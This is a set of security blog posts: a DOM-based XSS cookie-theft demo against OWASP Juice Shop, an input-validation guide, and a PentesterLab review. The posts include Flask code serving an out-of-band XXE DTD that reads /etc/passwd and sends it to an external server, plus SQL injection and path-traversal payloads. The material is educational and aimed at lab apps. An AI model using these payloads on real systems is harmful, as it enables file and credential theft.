In regard to login security, complex passwords, password rotation, captchas, 2FA, etc… are all poor solutions for a general audience due to the burden they put on users. Users resoundingly reject these ideas and technologies for day-to-day online activities, so something better is needed.

OT2FA is a practical tradeoff between security and usability. It offers much stronger than username/password-only security at very little usability impact. It can also fairly easily be implemented by any organisation. Most importantly, it is a realistic/practical solution for stopping large scale password guessing attacks without significantly burdening users.

Footnotes

Footnote 1: If one takes the unique identifier in the OT2FA token for revocation purposes approach, the use of server side persistent storage can change the whole implementation: rather than using digital signatures on the tokens, instead store a copy of each non-revoked token for each user on server side persistent storage.  When a user logs in with a OT2FA token, a simple verification that that token is in the server side database for that user takes the place of any digital signature check.  The major downside of this approach is that it requires more storage: one token for each device for each user, and any user could potentially generate a large number of them for himself using automated means.  If this is considered a threat, then obvious mitigating controls can be put in place.

Acknowledgments

The author would like to thank Dharshin De Silva for feedback on a preliminary version of this document.

Demonstrating Reflected versus DOM Based XSS

Update April 2021: Some changes to the heroku Juice Shop app have broken this demo.  The script payload no longer works for Juice shop, however there are other XSS payloads that do work, such as payloads that use onerror attribute of img tag.  I am not going to update the screenshots below, but I have updated the malicious server code so that one can still see the proof-of-concept.

Original Blog

In my employment, I am responsible for making sure developers produce secure code, and security education is a key part of reaching this goal.  There are many ways that one can approach security education, but one thing that I have found is that developers really appreciate seeing how attacks are performed and exploited in practice, so hacking demonstrations and workshops have so far been a hit.

In doing these demonstrations, I have found two intentionally insecure test sites that have very similar cross site scripting (XSS) vulnerabilities – Altoro Mutual and OWASP Juice Shop. In fact, on the surface the vulnerabilities look identical, but under the hood they are different: Altoro Mutual has a reflected XSS whereas the Juice Shop has DOM-based XSS. It turns out that DOM-based XSS is much more convenient to demonstrate in a corporate environment for a few reasons, and in general more favourable to an attacker.

In this blog, I explain why and show you how to build a really cool demo of exploiting the OWASP Juice Shop DOM-based XSS. You will need a malicious server for the demo, but I have the code and a sample server all ready for your convenience. The demo uses the malicious server to steal the victim’s cookie, and from there we are able to retrieve his password. Full details below.

Background

If you are not familiar with XSS, this section is for you. Everyone else, skip to the good stuff below.

XSS is when attacker can have his own JavaScript executing from somebody else’s website, and in particular from one or more victim user browsers.

The most famous XSS attack that I know of is the “Samy is my Hero” MySpace worm.  Although not as malicious as it could have been, Samy Kamkar created a script on MySpace that would send Samy a friend request and copy the script on the victim’s MySpace profile, along with displaying the string “but most of all, samy is my hero” on their profile. Within 20 hours, Samy had over one million friend requests.

The Samy worm was a persistent XSS, which means the script was permanently stored in the database. Persistent XSS vulnerabilities are the worst kind because everyone becomes vulnerable just by visiting the site.

Two other XSS types are reflected and DOM-based, which you will learn about in good detail by reading this blog. These are both less severe than persistent because the victim needs to be tricked into hitting the vulnerability (i.e. social engineering), but we will see that the consequences can be pretty bad for those who fall victim.  I have not seen any comparison of the severity of the two, but below I make the argument that DOM-based is more serious than reflected.

The Two Vulnerabilities

Let’s start with Altoro Mutual. In the search bar, you can type a script, for example a simple alert(“hello”) surrounded by <script> open and close tag:altoro_searchUpon hitting enter, you might see that the script executes (reflected XSS):altoro_mutual_xssHowever, you also might not see this. For example, if you try running it in a corporate environment, then the company proxy might have stopped it (one of the problems I ran into). If you use Chrome, you might have found that Chrome blocked it (one of the problems that the audience ran into when trying it — see screenshot below). There are workarounds for both cases, but it blunts the point of the severity of the issue when it only works in special cases.chrome_blocks_reflected.pngNow let’s try the exact same thing in OWASP Juice Shop. Type in your script in the search bar:juice_searchUpon hitting enter, I’m quite sure you will see this (DOM-based XSS):juice_xss In my case, neither the corporate proxy nor Chrome blocked it. There is a good reason for that.

Looking Closer

Let’s first confirm that the Altoro Mutual vulnerability is really reflected XSS and the OWASP Juice Shop is really DOM-based. We do that by sending communications through your favourite intercepting proxy. For Altoro Mutual, it looks like this:reflected_altoroWe see that the script entered in the search bar was reflected back as part of the html.
Now do the same with the Juice Shop:dom_juice_shopIt was not reflected back.

You can look further. If you open up your browser developer tools, you will see that the search value gets put into the html via client-side JavaScript. Inside the default Juice Shop html there is an input form which contains:

ng-model="searchQuery"

The ng-model is AngularJS functionality. AngularJS by default escapes content to prevent XSS, unless you code your JavaScript in a really dumb way, which was intentionally done for the Juice Shop:

r.searchQuery = t.trustAsHtml(e.search().q)

The trustAsHtml is an Angular method that does not do the default escaping.

Corporate proxies and browsers (Firefox currently does not) can easily block reflected XSS by checking whether the string sent contains a script and looking to see if the exact same string comes back. They can stop the hack as it is happening.

The same protection does not happen for DOM-based XSS. The attack happens entirely in the browser, which prevents corporate proxies from stopping it. It is a lot trickier for a browser to stop this type of attack than it is for one to stop reflected XSS.

Demonstrating Real Exploitation of DOM-based XSS

Although one can explain to developers and business people the dangers of XSS, nothing is more convincing than a real demonstration, and the OWASP Juice Shop is perfect for this. In our demonstration, we need a malicious server. I have created one for you that you can deploy in a couple minutes on Heroku: see github link. To speed things up, you can use my temporary server (to be taken down later).

In our demo, assume a user has logged into the OWASP Juice Shop. The user visits a malicious website that has a link promising free juice if you click it. Clicking the link triggers an XSS that takes the victim’s cookie and sends it to a “/recorddata” endpoint on the malicious server. From there, the attacker can hit a “/dumpdata” endpoint to display the captured cookies. The cookies contain JWTs, which when decoded, contain the MD5 hash of the user password (very dumb design, but I have seen worse in real code that was not intentionally insecure). Using Google dorking, the MD5 hash can be inverted to recover the victim’s password. Full details below.

First head over to the OWASP Juice Shop and click Login. From there, you can register. See Figure below:01_login_juiceFrom there you create the account of your victim user:02_create_accountNext, the victim logs in:03_victim_loginAll is fine and dandy, until somebody tells the victim of a website that offers free juice to OWASP Juice Shop customers. What could be better! The victim rushes to the site (for our temporary deployment, link is: https://frozen-crag-69213.herokuapp.com/freejuice):04_freejuiceUpon clicking the link, the DOM-based XSS is triggered. A nontechnical user would likely not understand that a script has executed from the malicious site. In fact, in this case, the script has taken the victim’s cookie and sent it to the malicious website. The malicious website has a “/recorddata” endpoint that records the cookie in a temporary file (a more serious implementation would use a database).05_link_clickedOur malicious server also has a “/dumpdata” endpoint for displaying all the captured cookies (here for our temporary server).06_retrieve_cookie
Inside the cookie is a JWT. Let’s copy that JWT into our clip board:07_copy_cookieAnd now head over to jwt.io where we can paste the token in and decode it:08_jwt_decodedAmazing! The username and password are in the cookie. But that’s not the real password, so what is it? Let’s Google it:09_google_dorkingAnd clicking the first link, we find out that it was the MD5 hash of the password. The real password is revealed in the link:10_get_password

Conclusion

I have found that rather than teach boring coding guidelines, developers much prefer to see security vulnerabilities and how they are exploited in practice. Once they learn the problems, they find a way to code them properly.  You know, developers are very good at using Google to find answers once they understand the problem they are trying to solve.

The OWASP Juice Shop is a great website for demonstrating security vulnerabilities, but in some cases you need to add your own parts to make the demo complete. In this blog, we provided the malicious server that executes a DOM-based XSS when a user clicks a link, which allows the attacker to recover the user’s password. The Juice Shop DOM-based XSS is much more convenient to demonstrate exploitation than the reflected XSS in Altoro Mutual.

For those familiar with CVSS for rating security vulnerabilities, the rating includes an attack complexity parameter to indicate whether special conditions need to exist for the attack to be successful. For reflected XSS, two special conditions were mentioned above: the victim’s browser would need to not defend against the attack (most browsers will stop it) and the victim needs to be in an environment where the attack would not be blocked. For DOM-based, it appears that there are no special conditions (browsers will not block the DOM-based attacks, and environment is irrelevant for this attack to work). Hence, DOM-based XSS are more favourable to attackers than reflected XSS, the difference being the complexity of pulling off the attack. Therefore, DOM-based XSS is more severe than reflect XSS, but less severe than persistent.

Secure Coding: Understanding Input Validation

Developers are often provided with a large amount of security advice, and it is not always clear what to do, how to do it, and how important it is. Especially considering that security advice has changed over time, it can be confusing. I was motivated to write this blog because the best guide I found on input validation is very dated, and I wanted to provide clear, modern guidance on the importance of the topic.  There is also the OWASP Input Validation Cheat Sheet as another source on this topic.

This blog is targeted to developers and Application Security leads who need to provide guidance to developers on best practices for secure coding.

Input validation the first line of defence for secure coding. There are many ways that a hacker will go after your software, and it would be naive to assume that you know all of them. The point of input validation is that, when done correctly, it will stop a number of attacks that you will not foresee. When it doesn’t completely stop them, it usually makes them more restricted or more difficult to pull off. Remember: input validation is not about stopping specific attacks, but instead a general defence for stopping any number of attacks.

Input validation is not hard to do, but sometimes it takes time to figure out what character set the data should conform to. This blog will be primarily focused on web applications, but the same concepts apply in other scenarios.

Below is guidance on how to do it, when to do it, and examples of how input validation might save you if you got other parts of the coding wrong. It must be emphasised that input validation is not a panacea, but when done correctly, it sure makes your application a lot more likely to resist a number of attacks.

What is input validation?

Hackers attack websites by sending malicious inputs. This could be through a web form or AJAX request, or by sending requests directly to your API with tools such a curl or python, or by using an intercepting proxy (typically burp, but other tools include zap and charles) which is somewhere in between the former two methods.

Input validation means to check on the server side that the input supplied by the user/attacker is of the form that you expect it to be. If it is not of the right form, then the data should be rejected, typically with a 400 http status code.

What is meant by right form? At the minimum, there should be a check on the length of the data, and the set of characters in the data. Sometimes, there are more specific restrictions on the data — consider some insightful examples below.

Example: phone number. A phone number is primarily digits, with a maximum of 15 digits. If you allow international numbers, then plus (‘+’) is a valid character. If the area code is in parentheses, then the parentheses are additionally valid characters. If you want to allow the user to enter dashes or spaces, then you can add those to the list of allowed character as well, though you don’t need to (front end developers can make it so that the user does not need to send such data). In total we have at most 15 different valid characters and at most 15 digits — this is your validation rule. Additionally, you should always have a limit on the total length of the string supplied (including parentheses, spaces, dashes, pluses) to stop malicious users from fiddling.

Example: last name. This one is more complicated, but a Google search gives us a pretty good answer. Importantly, you need to allow hyphens (Hector Sausage-Hausen); spaces, commas, and full stops (Martin Luther King, Jr.); and single quotes (Mathias d’Arras). See also the comments that identify extra characters that should be included if one wants to truly try to accept all international names, but it depends upon your application. As for length limit, if you really want to allow the longest names in the world, you can, but I would personally think a limit like 40 characters is sufficient.

Example: email address. Email addresses are examples where there character set is well defined, but the format is restricted. There are published regular expressions all over the web that tell you how to validate email addresses, but this one looks quite useful because it tells you how to do it in many different languages.

Example: a quantity. A common requirement for ecommerce applications is to allow the customer to choose some number of items. Quantities should be positive integers, and there should be some reasonable upper limit to how many the person can choose. For example, you might allow only the quantities 0, 1, 2, …, 99 and anything else is rejected.

There are two types of input validation strategies: white list and black list. The examples above are white list — we have said exactly what is allowed and anything else is rejected. The alternative approach, black list, tells what is not allowed and accepts everything else. White list validation is a general defence that is not targeted towards a specific attack, and can often stop attacks that you may not foresee. On the other hand, black list validation rules out dangerous characters for a specific attack that you have in mind. Black list should never be relied upon by itself — we will talk more about that in the next section.

When and how to do it?

Validation must happen on the server side, and should be done before you do anything else with the data.

It’s not unusual to see client side validation (for usability), but if you do not also validate on the server side (for security), then it will stop your kid sister and nobody else. Remember, web hackers do not need to run the same JavaScript code that you serve to them. Most of the time, they are going to use an intercepting proxy to modify the request after it leaves the browser but before it reaches the server. For example, see this video.  [Footnote: there are some edge cases where client side input validation makes sense for security, such as DOM based XSS, but these are advanced topics that are beyond the scope of this blog.]

What should be validated? Any data that you use that an attacker can manipulate. For web applications, this includes query parameters, http body data, and http headers. For emphasis, you don’t need to validate every http header — instead, only validate the ones that your application uses somewhere in the code. I’ve seen a number of cases where applications use http headers such as User-Agent without realising that an attacker could put anything he wants for such values. For example, with curl one would just use the -H option.

Validation should be done immediately, before anything else (including logging) is done with the data. I’ve seen cases where developers tried to validate strings that were formed by concatenating fixed values with user input. Because the validation happened on the result of the string concatenation, the validation routine had to be liberal enough to allow every character in the fixed string. But one of the characters in the fixed string was key to allowing the attacker to supply his own malicious input. Since the validation had to allow it when coded this way, a hack was trivial to pull off.

MVC frameworks such as .Net and Spring have good documentation on how to do input validation. For example, Microsoft has nice pages about input validation in various versions of ASP.NET MVC. Similarly, Spring has documentation and additional guidance can be found in various places.  In other cases, you might use a framework design specifically for data validation, or write custom validation methods.

Importantly, white list validation must always be done. Black list validation can supplement white list validation, but it cannot be relied upon by itself to stop an attack. The reason is that hackers are very good at finding ways around black list validation.

Yes, it is your responsibility

The diagram below depicts an example that I have seen a number of times, especially in microservices architectures.  System A receives data from the user, and passes it off to internal System B.  System B processes the data.  Where should input validation happen?

validate_internal_system

The developers of System A believe they are mainly acting as a proxy, and therefore the responsibility for input validation lies with System B.  On the other hand, the developers of System B believe they are getting data from an internal trusted source (System A), and therefore the responsibility for validating it lies with System A.  As a consequence, neither development team validates the data.  In the event that they get hacked, everyone has an excuse on why they didn’t do it.

The answer is that both are responsible for validating their input data.

System A needs to validate because otherwise it is vulnerable to various injection attacks when the data gets sent to system B, such as json injection or http header injection.  System B should validate their data because the muppets who wrote System A rarely do any type of meaningful validation on the data you process.  In summary, no matter where you are developing, you need to validate your input.  Don’t assume that somebody else is going to do it for you, because they won’t.

What about input sanitisation?

Sanitisation refers to changing user input so that it becomes not dangerous. The issue here is that what is dangerous depends upon the context in which it is used.

For example, suppose some user input is first logged and then later displayed to the user in his browser. In the context of logging, dangerous characters are new lines (ASCII value of 10) and carriage returns (ASCII value of 13) because they allow attackers to create a new line of your log file with anything he wants, an attack known as log forging (log forging discussed in more detail when we get to examples later). On the other hand, when it is displayed to the user, the dangerous characters become those that can be interpreted by the browser to do something that is not intended by the web designer — the characters < > / and “ are the first that come to mind (normally we escape these characters).

It is not unusual for developers to get this wrong.  I have seen more than once the use of the OWASP Java HTML Sanitizer to attempt to sanitise data written to the log.  Wrong tool, wrong context.

Because sanitisation depends upon context, it is not desirable to try to sanitise inputs at the beginning in such a way that they will not be dangerous when later used. In other words, input sanitisation should never be used in replace of input validation. Input validation should always be done.  Thus, even if you get the sanitisation wrong (e.g. see previous paragraph), input validation will often save you.

Note also that the concept of input sanitisation is making us think in a black list approach rather than a white list approach, i.e. we are thinking about what characters might be harmful in a specific context and what to do with them. This is another reason why input sanitisation should not displace input validation. Even very good developers  have learned this the hard way.

The bottom line is that white list input validation is a general defence, whereas input sanitisation is a specific defence. General defences should happen when input comes in (at “source”), specific defences should happen when the data is later used (at “sink”). Never omit the general defence.

Examples

We have given the guidance, but now let’s justify it with examples. Let’s see how input validation can often save us when proper coding defences are lacking somewhere else in the code base. An important takeaway here is that even though input validation does not stop everything, it certainly does stop a lot, and makes other attacks a lot harder. Given how easy it is to perform the validation, the bang-for-your-buck-analysis dictates to always do it.

Example: SQL injection

SQL injection vulnerabilities are most often due to forming SQL queries using string concatenation/substitution with user input. A typical example looks like this (Java):

String query = 'SELECT * FROM User where userId='' + request.getParameter('userId') + ''';  // vulnerable

To get all users, the attacker can send the following for the userId parameter: xyz’ or 1=1 –.
That malicious input will change the query to:

SELECT * FROM User where userId='xyz' or 1=1 -- '

The attacker can do much more than this with more clever inputs, including fetching other columns or deleting the entire database. However, sticking to the simple example, notice the tools the attacker is using: the single quote to end the userId part of the query, the white spaces to add other statements, the equal to make a comparison that is always true, and the double dash to escape the remaining part of the query.

The proper defence against SQL injection, which should always be done, is either prepared statements or parameterised queries. However, let’s consider what would happen if the developer had validated the input but still formed the query with string concatenation.  In this case, the code might look like:

// This code is still wrong, but it is better than above
String userId = request.getParameter('userId');
if ( !validateUserId( userId ) )
{
    // Handle error condition, return status code of 400
    ...
}
String query = 'SELECT * FROM User where userId='' + userId + '''; // <--- Don't do this!

For data types like user ids, phone numbers, quantities, email addresses, and many others, input validation would not have allowed the single quote, which has already stopped the attack. However, for a field like a last name, a single quote must be allowed or else O’Malley will throw a fit.

Still, input validation would not have allowed the equal character in the last name and some other characters that attackers like to use. Additionally, limiting the number of characters that an attacker can provide (example: 40 for last name) would also impede the attacker. Truthfully, a good hacker would still succeed in getting an injection, but you might have stopped the script kiddie. The lesson here is: Just because you validated the data does not mean that you can be sloppy elsewhere.

A great website telling how to code sql queries in various languages is Bobby Tables. They have a nice comic, but unfortunately the punch line is wrong:

xkcd

As the website, correctly says on the about page: The answer is not to “sanitize your database inputs” yourself. It is prone to error. Instead, use prepared statements or parameterised queries.

Example: Log forging

A well written application should have logging throughout the code base. But logging user input can lead to problems. For example (C#):

log.Info("Value requested is " + Request["value"]); // vulnerable

Log files are separated by newlines or carriage returns, so if the value from the user contains a newline or a carriage return, then the user is able to put anything he wants into your log file, and it will be very hard for you to distinguish between what is real versus what was written by the attacker. If you did proper validation of your input, there are not many cases where one would allow newlines and/or carriage returns, so the validation would usually save you.

For a good technique to prevent log forging, see this nice blog by John Melton (the same concept works regardless of language).

Example: Path manipulation

Many web applications these days allow the user to upload to or read something from the server file system. It is not unusual for the file name to be formed by concatenating a fixed path with a file name provided by the user (C#):

String fn = Request["filename"]; // fn could have dangerous input
String filepath = USER_STORAGE_PATH + fn;
String[] lines = System.IO.File.ReadAllLines(filepath); // vulnerable

The above example does not validate the user provided filename, but normally a filename would only allow alphanumeric characters along with the ‘.’ for file extensions.

The risk here is that a user provides a file name of something like: ../../../system_secrets.txt (fictional file name). This allows the attacker to read the system_secrets.txt file which is outside the USER_STORAGE_PATH path. Note that the input validation would not have prohibited the use of ‘.’ , but it would have prevented from using the forward or backward slash, which is key to his success.

More generally, I don’t recommend that users should be able to provide the direct file names to access, and storage should be on a separate system. But even if you go against that advice, proper input validation will save you from path manipulation.

Example: Server side request forgery

This is a nice example because not many people know what it is, but it has recently become quite a nice tool that hackers have added to their toolbox.

Consider that your web application might initiate an http request, where the destination of that request is somehow formed from user input. One might think that making the http request from the server is benign, because it is no different from the user making a similar request from his browser. But that reasoning is wrong, because the request from your server has access to your internal network, whereas the user himself should not.

An example is insightful. The website InterviewCake teaches developers how to solve difficult job interview questions. From the website, you can actually write code in a number of different languages and run it, which runs in an AWS environment. It was then too easy for Christophe Tafani-Dereeper to write some simple python code on InterviewCake that reveals AWS security credentials from the private network that the application was hosted on:

aws_exploit

This type of attack is common in AWS environments: learn about AWS Instance Metadata from Amazon.

Of course, allowing users to run arbitrary code in an environment that you host is extremely dangerous and is hard to defend against. More often we see cases like the following from StackOverflow (PHP):

php_ssrf

In the above example, the server will get the url of a file from a query parameter.  It assumes that the file type is either gif, png, or jpg, and then it servers that content to the client.  The only validation check is that the protocol is http (or https).

Although it appears to restrict to gif, png, or jpg files, the default is to just read the content regardless of type. An attacker could thus request anything he wants, and the command is executed with server privileges.

To fix it, the server needs to validate that the incoming url is allowed to be accessed by the user. This can be done by verifying that the url matches a white list of allowed URLs. In this case, white list validation defeats the attack completely (when implemented properly), and no other defence is needed.

Example: Cross site scripting

Cross site scripting (XSS) is an old vulnerability that is still a major problem today. There are three types of XSS, but we’re not going to that level of detail. XSS happens when untrusted input (typically user input) is interpreted in a malicious way in another user’s browser. Let’s look at a simple example (Java JSP):

<% String name = request.getParameter("name"); %>
Name provided: <%= name %>

If the input provided contains the query parameter

malicious_javascript

then that JavaScript will execute in a user’s browser. This type of XSS (reflected XSS) is typically exploited by user A emailing a link to user B with the malicious JavaScript embedded in it.

The proper defence for XSS is to escape the untrusted input. In JSP, this can be done with the JSTL <c:out> tag or fn:escapeXml(). But this needs to happen everywhere untrusted data is displayed, and missing one place can result in a critical security vulnerability.

Similar to other examples, input validation will often save you in the event that you missed a single place where the output needs to be escaped. As noted above, the characters < > / and ” are particularly dangerous in the context of html. These characters are rarely part of a while list of allowed user input.

Despite the dire warnings above, it is great to know that there are frameworks like Angular that escape all inputs by default, thus making XSS extremely unlikely to happen in that framework. Secure by default — what a novel concept.

Conclusion

White list input validation should always be done because it prevents a number of attacks that you may not foresee. This technique should happen as soon as data comes in, and invalid input should be rejected without further consideration. Input validation is not a panacea, so it should be coupled with specific defences that are relevant to the context in which the data is used. Input validation should be applied at the source, whereas the other specific defences are applied at the data sinks.

A Review of PentesterLab

stickers

After completing my fourth badge on PentesterLab, I have enjoyed it so much that I thought I would pass on the word on what a great learning resource it is. If I had to summarise it in one sentence, I would say an extremely well written educational site about web application pentesting that caters to all skill levels and makes it easy to learn at an incredibly affordable price (US$20 per month for pro membership, and there is no minimum number of months or annoying auto-renewal in signup). If you are uncertain whether it is for you, start by checking out the free content.

Without pro membership, you can still download many ISOs and try the exercises yourself locally. However with the pro membership will you get more content and you do not have the overhead time of downloading ISOs, spinning up VMs, and related activities.

This blog is about what you will get out of it and what you should know going in. In my opinion, the best way to do justice in describing PentesterLab is to talk about some of the exercises on the site. So at the end of the blog, I dive down into the technical fun stuff, describing three of my favourites. If none of those exercises pique your interest, then never mind!

For the record, I have no connection to the site author, Louis Nyffenegger. I have never met him, but I have exchanged a few emails with him in regard to permission to blog about his site. My opinion is thus unbiased — my only interest is blogging about things that I am passionate about, and PentesterLab has really worked for me.

What you can expect to learn

A few examples of what you can expect to learn from PentesterLab:

  • An introduction to web security, through any of the Web for Pentesters courses or Essential badge or the Introduction badge or the bootcamp.
  • Advanced penetration testing that often leads to web shells and remoted code execution, in the White badge, Serialize badge, Yellow badge, and various other places. Examples of what you get to exploit include Java deserialization (and deserialization in other languages), shell shock, out of band XXE, recent Struts 2 vulnerabilities (CVE-2017-5638), and more.
  • The practical experience of breaking real world cryptography through exercises such as Electronic Code Book, Cipher Block Chaining, Padding Oracle, and ECDSA. Note: Although the number of crypto exercises here cannot compete with CryptoPals (which is exclusively about breaking real world cryptography), at least at PentesterLab you get certifications (badges) as evidence of your acquired skills.
  • Practical experience bypassing crypto when there is no obvious way to break it, such as in API to shell, Json web token, and Jason web token II.
  • Practical experience performing increasingly sophisticated man-in-the-middle attacks in the Intercept badge.
  • Fun challenges that will really make you think in the Capture the flag badge.

The author is updating the site all the time, and it is clear that more badges and exercises are on the way.

In addition to learning lots of new attacks on web applications, I can also say that I personally picked up a few more skills that I was not expecting:

  • Learning some functionality of Burp suite that I had not known existed. I thought I knew it well before I started, but it turns out that there were a number of little things that I did not know, often picked up by watching the videos (only available via pro membership).
  • Learning more about various types of encoding and how to do it in the language I choose (in my case, Python). The Python functionality I needed was not given to me from the site, but I was drawn to learn it as I was trying to solve various challenges. For example, I now know how the padding works in base64 (which is important because not all of the encodings I got from challenges were directly feedable into Python), and I learned about the very useful urllib.quote.
  • Getting confidence in fiddling with languages that I had little experience in, such as PHP and Ruby.

What you should know going in

What you need depends upon what exercises you choose to do, but I expect most people will be like me: wanting to get practical experience exploiting major vulnerabilities that don’t always fall into the OWASP Top 10. For such people, I say that you need to be comfortable with scripting and fiddling around with various programming languages, such as Ruby, PHP, Python, Java, and C. If you haven’t had experience with all of these languages, that’s okay: there are good videos (pro membership) that help enormously. The main thing is that you need to be not afraid to try, and there might be sometimes where you might need to Google for an answer. But most of the time, you can get everything you need directly from PentesterLab.

I personally like to use Cygwin on Windows and/or a Linux virtual machine. The vast majority of the time, I was able to construct the attack payload myself (with help from PentesterLab), but there are a few exercises such as Java Deserialization where you need to run somebody else’s software (in this case, ysoserial). Although that comes from very reputable security researchers, I being ultra-paranoid prefer to run software I don’t know on a virtual machine rather than my main OS.

If you are an absolute beginner in pentesting and have no experience with Burp, I think that you will be okay. But you will likely depend upon the videos to get you started. The video in the first JWT exercise will introduce you to setting up Burp and using the most basic functionality that you will need. By the way, I have done everything using the free version of Burp, so no need to buy a licence (until you’re ready to chase bug bounties!)

Quality of the content

For each exercise there is a course with written material, an online exercise (pro membership only — others can download the ISO), and usually there are videos (pro members only).

You can see examples of the courses in the free section, and I think the quality speaks for itself. With pro membership, you get a lot more of this high quality course material. The only thing that I would suggest to the author is that including a few more external references for interested readers could be helpful. For example, the best place to learn about Java deserialization is Foxgloves security, so it would be great to include the reference.

The videos really raise the bar. How many times have you struggled through watching a Youtube video showing how to perform an attack with frustration of the presentation? You know, those videos where the author stumbles through typing the attack description (never talking), with bad music in the background? Maybe you had to search a few times before finding a video that is reasonably okay. Well, not here — all the videos are very high quality. The author talks you through it and has clearly put in a lot of thought into explaining the steps to those who do not have the experience or background with the attack.

Last, the online exercises are perfect: simple and to the point, allowing us to try what we learned.

Sometimes the supporting content is enough for you to do an entire exercise, other times you have to think a bit. Many videos are spoilers — they show you how to solve the exercise completely (or almost completely), but it is usually best to try yourself before falling back to the videos: you won’t get more out of it than what you put into it.

Finally, I want to compare the quality of PentesterLab to some other educational material that I have learned a lot from:

  • OSCP, which is infrastructure security as opposed to the web application security from PentesterLab. OSCP is the #1 certification in the industry, and is at a very reasonable price. It also has top quality educational material. I learned a lot doing OSCP, but the problem is that I did not complete it. I ran out of time (wife and kids were beginning to forget who I was) to work on it. And despite having picked up so many great skills from enrolling, at the end of the day it never helped me land a pentester job close to my desired salary level. I guess I needed to just try harder. The great thing about PentesterLab is that it’s not an all or nothing deal: you will pick up certification (badge) after certification (badge) as you go along. In terms of quality comparison, I’d say PentesterLab material is on par with OSCP.
  • Webgoat is the go-to free application for learning about penetration testing. I played with it a few years ago and learned a fair amount. There were a few exercises that I did not know how to solve, and I was rather frustrated that the tool did not help me. For example, in one of the SQL injection exercises, I needed to know how to get the column names in the database schema in order to solve it (I want to understand rather than just sqlmap it). I really think the software should have provided me some guidance on that (I know how to do that now, thanks to PentesterLab). PentesterLab just provides a lot more guidance and support, and has a lot more content.
  • Infosec Institute in my experience has been a fantastic source of free information to help learn application security. It covers a wide variety of topics in very good detail. But it lacks the nice features you get with PentesterLab pro membership: videos, and the ability to try online without the overhead of fetching resources from other places to get set up.  If your time is precious, the US$20 per month is nothing in comparison to what you gain from PentesterLab pro.

What most amazes me is that just about all of the content here was primarily made by a single person. Wow.

Three example exercises I really liked

Exercise: Play XML Entities (Out of band XXE)

XXE is a fun XML vulnerability that can allow an attacker to read arbitrary files on the vulnerable system. Although many XXE vulnerabilities are easy to exploit, there are other times where the vulnerability exists but the file you are trying to read from the OS does not get directly returned to you. In such cases, you can try an out of band XXE attack, which is what the Play XML Entities exercise is all about.

In the course the author provides an awesome diagram of how it all works, which he explains in detail:

steps

(Diagram copyright Louis Nyffenegger, used with his permission).

Briefly, the attacker needs to setup by having his own server (“Attacker’s server” in diagram) that serves a DTD. The attacker sends malicious XML to the server (step 1), which then remotely retrieves the attacker’s DTD (steps 2-3). The DTD instructs the vulnerable server to read a specific file from the file system (step 4) and provide to the attacker’s server (step 5).

So to start out, you need your own web server that the vulnerable application will fetch a DTD from. In this case, you are a bit on your own on what server you are going to use. I personally have experience with Heroku, which lets you run up to 5 small applications for free.

PentesterLab shows how to run a small Webrick server (Ruby), but I’m more of a Python guy and my experience is with Flask. Warning: Heroku+Flask has been a real pain for me historically, but I now have it working so I just continue to go with that.

To provide a DTD that asks for the vulnerable server to cough up /etc/passwd, I did it like this in Flask:

@app.route('/test.dtd')
def testdtd():
    dtd = '''
    <!ENTITY % p1 SYSTEM "file:///etc/passwd">
    <!ENTITY % p2 "<!ENTITY e1 SYSTEM 'https://contini-heroku-server.com/recorddata?%p1;'>">
    %p2;'''
    return dtd

The recorddata endpoint is another Flask route (code omitted) that records the /etc/passwd file retrieved from the vulnerable server (my DTD is essentially equivalent to the one from PentesterLab).

This is all fine and dandy except one thing: /etc/passwd is not the ultimate goal in this exercise. Instead, there is a hidden file on the system somewhere that you need to find, and it contains a secret that you need to get to mark completion of the exercise. So, a static DTD like this doesn’t do what I need.

At first, I was manually changing the DTD every time to reference a different file, then re-deploying to Heroku, and then trying my attack through Burp. I thought I would find the secret file quickly, but I did not. This was way too manual, and way to slow. What an idiot I was for doing things this way.

Then I used a little intelligence and did it the right way: Make the Flask endpoint take the file name as a query string parameter, and return the corresponding DTD:

@app.route('/smart.dtd')
def dtdsmart():
    targetfile=request.args.get('targetfile')
    dtd = '''
    <!ENTITY % p1 SYSTEM "file:///''' + targetfile + '''">
    <!ENTITY % p2 "<!ENTITY e1 SYSTEM 'https://contini-heroku-server.com/recorddata?%p1;'>">
    %p2;'''
    return dtd

I was very proud of myself for this trivial solution. Never mind the security vulnerability in it!

Overall, the course material gives a great description on what to do, but sometimes you have to bring in your own ideas to do things a better way.

Exercise: JWT II

Json Web Tokens (JWT) are a standard way of communicating information between parties in a tamper-proof way. Except when they can be tampered.

In fact, there is a fairly well known historical vulnerability in a number of JWT libraries. The vulnerability is due to the JWT standard allowing too much flexibility in the signing algorithm. One might speculate why JWTs were designed this way.

PentesterLab has two exercises on bypassing JWT signatures (pro members only). The first one is the most obvious way, and the way you would most likely pull it off in practice (assuming a vulnerable library). The second is a lot harder to pull off, but a lot more fun when you succeed.

In JWT II, your username is in the JWT claims, digitally signed with RSA. You need to find a way to change your username to ‘admin’, but the signature on it is trying to stop you from doing that.

To bypass the signature, you change the algorithm in the JWT from RSA (an asymmetric algorithm) to HMAC (a symmetric algorithm). The server does not know that the algorithm has changed, but it does know how to check signatures. If it is instructed to check the signature with HMAC, it will do so. And it will do it with the key it knows — not an HMAC key, but instead the RSA public key.

In this exercise, you are given the RSA public key, encoded. At a theoretical level, exploiting it may seem easy: just create your own JWT having username ‘admin’, set the algorithm to HMAC, and then sign it by treating the RSA public key like it is an HMAC key.

In practice, it’s not that simple. When I was attempting this, I was completely bothered by not knowing how to treat an RSA key as an HMAC key. I attempted in Python, fiddling around a few different ways for inserting the key to create the signature. None of them worked.

I thought to myself that this depends so much on implementation, and surely there must be a better way of going about things than random trials. Hmmmm, somehow the author must have left a hint on how to encode it so we can solve the exercise…

light-bulb16-177x240

Exercise: ECDSA

According to stats on the site, the ECDSA looks to be the most challenging exercise. I decided to go after it because I was once a cryptographer and I was excited to see an exercise like this.

Honestly, most people will not have the cryptographic background to do an exercise like this, particularly because ECDSA is in the capture the flag badge, so there is no guidance. You are on your own, good luck! But I’ll drop you a hint.

In the exercise, they give you the Ruby source code, which is a few dozen lines. The functionality of the site allows you to register or login only. Your goal is to get admin access.

From the source code you will see that it digitally signs with an ECDSA private key a cookie with your username in it. To check the cookie, it verifies the signature with the public key.

The most surprising thing here is that you don’t even get the public key (nor the private key, of course). You have to somehow find a way to create a digitally signed cookie with the admin username in it, and you have absolutely nothing to go by other than the source code.

I promised you a hint. Look for a prominent example of ECDSA being broken in the real world.

Concluding Remarks

I think it is clear that I really, really like this website and highly recommend it. Having said that, it is always better to get more than one opinion, and for that reason, I invite other users of PentesterLab either to comment here or on reddit about their experience with the website.

